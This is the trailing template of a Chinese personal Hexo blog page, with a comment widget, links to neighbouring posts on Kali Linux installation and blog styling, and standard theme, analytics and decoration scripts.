        border: 1px solid #dfe2e5;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }
</style>

<div class="card valine-card" data-aos="fade-up">
    <div class="comment_headling" style="font-size: 20px; font-weight: 700; position: relative; left: 20px; top: 15px; padding-bottom: 5px;">
        <i class="fas fa-comments fa-fw" aria-hidden="true"></i>
        <span>评论</span>
    </div>
    <div id="vcomments" class="card-content" style="display: grid">
    </div>
</div>

<script src="/libs/valine/av-min.js"></script>
<script src="https://image.12679.top/valine/Valine.min.js"></script>
<script>
    new Valine({
        el: '#vcomments',
        appId: 'I3wOlp7afLKRV583imHzIju3-gzGzoHsz',
        appKey: 'WKVJsARrWKVFK0wdDoInKM71',
        notify: 'false' === 'true',
        verify: 'false' === 'true',
        visitor: 'true' === 'true',
        avatar: 'mm',
        pageSize: '10',
        lang: 'zh-cn',
        placeholder: 'just go go'
    });
</script>

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2020/04/14/14/">
                    <div class="card-image">
                        
                        
                        <img src="https://image.12679.top/featureimages/14.jpg" class="responsive-img" alt="kali系统安装和汉化">
                        
                        <span class="card-title">kali系统安装和汉化</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            1、首先到kail官网下载 https://www.kali.org/downloads/之后点击这个链接，点击下载Vmware版本的kali系统下载成功之后用Vmware打开，这个试衣镜安装好的，不需要手动安装，用户名：kali，密码：k
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2020-04-14
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/%E9%81%87%E5%88%B0%E9%97%AE%E9%A2%98%E8%A7%A3%E5%86%B3%E6%B1%87%E6%80%BB/" class="post-category">
                                    遇到问题解决汇总
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/linux%E7%B3%BB%E7%BB%9F/">
                        <span class="chip bg-color">linux系统</span>
                    </a>
                    
                    <a href="/tags/%E7%B3%BB%E7%BB%9F%E9%97%AE%E9%A2%98%E8%A7%A3%E5%86%B3/">
                        <span class="chip bg-color">系统问题解决</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2020/03/24/12/">
                    <div class="card-image">
                        
                        
                        <img src="https://image.12679.top/featureimages/3.jpg" class="responsive-img" alt="博客样式修改">
                        
                        <span class="card-title">博客样式修改</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            参考:matery主题个性化定制Hexo+Github博客搭建完全教程Markdown Emoji表情语法速查表hexo博客添加一级分类相册功能PicGo+GitHub：你的最佳免费图床选择！Hexo 博客优化之博客美化
注意： 以下功能均
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2020-03-24
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/%E5%8D%9A%E5%AE%A2%E6%90%AD%E5%BB%BA/" class="post-category">
                                    博客搭建
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/hexo%E5%8D%9A%E5%AE%A2/">
                        <span class="chip bg-color">hexo博客</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>


<script>
    $('#articleContent').on('copy', function (e) {
        // IE8 or earlier browser is 'undefined'
        if (typeof window.getSelection === 'undefined') return;

        var selection = window.getSelection();
        // if the selection is short let's not annoy our users.
        if (('' + selection).length < Number.parseInt('120')) {
            return;
        }

        // create a div outside of the visible area and fill it with the selected text.
        var bodyElement = document.getElementsByTagName('body')[0];
        var newdiv = document.createElement('div');
        newdiv.style.position = 'absolute';
        newdiv.style.left = '-99999px';
        bodyElement.appendChild(newdiv);
        newdiv.appendChild(selection.getRangeAt(0).cloneContents());

        // we need a <pre> tag workaround.
        // otherwise the text inside "pre" loses all the line breaks!
        if (selection.getRangeAt(0).commonAncestorContainer.nodeName === 'PRE') {
            newdiv.innerHTML = "<pre>" + newdiv.innerHTML + "</pre>";
        }

        var url = document.location.href;
        newdiv.innerHTML += '<br />'
            + '来源: P1n9<br />'
            + '文章作者: P1n9<br />'
            + '文章链接: <a href="' + url + '">' + url + '</a><br />'
            + '本文章著作权归作者所有，任何形式的转载都请注明出处。';

        selection.selectAllChildren(newdiv);
        window.setTimeout(function () {bodyElement.removeChild(newdiv);}, 200);
    });
</script>


<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


<!-- 代码块折行 -->

<style type="text/css">
code[class*="language-"], pre[class*="language-"] { white-space: pre !important; }
</style>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="https://image.12679.top/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>



    <footer class="page-footer bg-color">
    
    <div class="container row center-align" style="margin-bottom: 15px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            <span id="year">2020</span>
            <a href="http://12679.top" target="_blank">P1n9</a>
			&nbsp;&nbsp;
            
            <span id="icp"><img src="/medias/icp.png" style="vertical-align: text-bottom;" />
                <a href="http://www.beian.miit.gov.cn" target="_blank">晋ICP备20001718号-1</a>
            </span>
            
			<br>
            
            &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                class="white-color">48.3k</span>&nbsp;字
            
            
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>
            
            <span id="sitetime">载入运行时间...</span>
            <script>
                function siteTime() {
                    var seconds = 1000;
                    var minutes = seconds * 60;
                    var hours = minutes * 60;
                    var days = hours * 24;
                    var years = days * 365;
                    var today = new Date();
                    var startYear = "2020";
                    var startMonth = "3";
                    var startDate = "1";
                    var startHour = "0";
                    var startMinute = "0";
                    var startSecond = "0";
                    var todayYear = today.getFullYear();
                    var todayMonth = today.getMonth() + 1;
                    var todayDate = today.getDate();
                    var todayHour = today.getHours();
                    var todayMinute = today.getMinutes();
                    var todaySecond = today.getSeconds();
                    var t1 = Date.UTC(startYear, startMonth, startDate, startHour, startMinute, startSecond);
                    var t2 = Date.UTC(todayYear, todayMonth, todayDate, todayHour, todayMinute, todaySecond);
                    var diff = t2 - t1;
                    var diffYears = Math.floor(diff / years);
                    var diffDays = Math.floor((diff / days) - diffYears * 365);
                    var diffHours = Math.floor((diff - (diffYears * 365 + diffDays) * days) / hours);
                    var diffMinutes = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours) /
                        minutes);
                    var diffSeconds = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours -
                        diffMinutes * minutes) / seconds);
                    if (startYear == todayYear) {
                        document.getElementById("year").innerHTML = todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已安全运行 " + diffDays + " 天 " + diffHours +
                            " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    } else {
                        document.getElementById("year").innerHTML = startYear + " - " + todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已安全运行 " + diffYears + " 年 " + diffDays +
                            " 天 " + diffHours + " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    }
                }
                setInterval(siteTime, 1000);
            </script>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/zdy/zdy.github.io" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:643684107@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=643684107" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 643684107" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script src="/js/search.js"></script>
<script type="text/javascript">
$(function () {
    searchFunc("/" + "search.xml", 'searchInput', 'searchResult');
});
</script>
    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="https://image.12679.top/materialize/materialize.min.js"></script>
    <script src="https://image.12679.top/masonry/masonry.pkgd.min.js"></script>
    <script src="https://image.12679.top/aos/aos.js"></script>
    <script src="https://image.12679.top/scrollprogress/scrollProgress.min.js"></script>
    <script src="https://image.12679.top/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Global site tag (gtag.js) - Google Analytics -->

<script async src="https://www.googletagmanager.com/gtag/js?id=UA-161839843-1"></script>
<script>
    window.dataLayer = window.dataLayer || [];
    function gtag() {
        dataLayer.push(arguments);
    }

    gtag('js', new Date());
    gtag('config', 'UA-161839843-1');
</script>


    <!-- Baidu Analytics -->

<script>
    var _hmt = _hmt || [];
    (function () {
        var hm = document.createElement("script");
        hm.src = "https://hm.baidu.com/hm.js?7fc02ada382f9c86da55ef7e31ca60f8";
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(hm, s);
    })();
</script>

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="https://image.12679.top/others/clicklove.js" async="async"></script>
    
    
    <script async src="https://image.12679.top/others/busuanzi.pure.mini.js"></script>
    

    

    

    
    <script type="text/javascript" color="0,0,255"
        pointColor="0,0,255" opacity='0.7'
        zIndex="-1" count="99"
        src="https://image.12679.top/background/canvas-nest.js"></script>
    

    

    
    <script type="text/javascript" src="https://image.12679.top/background/ribbon-dynamic.js" async="async"></script>
    
    
    
    <script src="https://image.12679.top/instantpage/instantpage.js" type="module"></script>
    
	
	<!-- 页面点击特效 -->
	<script type="text/javascript" src="/js/jquery-3.3.1.min.js"></script>
	<script type="text/javascript" src="/js/click-word.js"></script>
</body>

</html>
